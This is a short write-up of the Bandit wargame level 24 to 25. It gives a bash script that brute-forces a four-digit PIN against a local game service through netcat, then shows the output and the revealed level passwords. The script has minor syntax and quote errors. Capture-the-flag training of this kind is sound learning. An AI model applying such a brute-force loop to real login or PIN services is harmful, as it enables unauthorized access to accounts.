Bandit - Going to Level 25

2 November 2017

Goal

Getting the information

#!/bin/bash
pass=’UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ’
log=’/tmp/bckBandit/log’
answer=’/tmp/bckBandit/answer’
echo "−−−␣Cleaning␣log␣file␣−−−"
rm $log
touch $log
echo "−−−␣Creating␣answer␣file␣−−−"
rm $answer
touch $answer
for pin in $(seq −w 0 9999);
do
try="$pass$pin";
progress="−−−−−−−−−−−␣Trying␣$try␣−−−−−−−−−−";
echo $progress;
echo $progress >> $log;
result=$(echo $try | nc localhost 30002);
if [[ $result =="Wrong"]]
then
echo "Not␣found,␣trying␣next␣value...";
else
echo "FOUND␣IT␣:\n$result";
echo $result >> $answer;
break;
fi
done
output
−−−−−−−−−−− Trying UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5666 −−−−−−−−−−
Not found, trying next value...
−−−−−−−−−−− Trying UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5667 −−−−−−−−−−
Not found, trying next value...
−−−−−−−−−−− Trying UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5668 −−−−−−−−−−
Not found, trying next value...
−−−−−−−−−−− Trying UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5669 −−−−−−−−−−
FOUND IT :\n I am the pincode checker for user bandit25. Please enter the password for user bandit2
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.
bandit24@melinda:/tmp/bckBandit$ cat answer

I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space. Correct! The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG Exiting.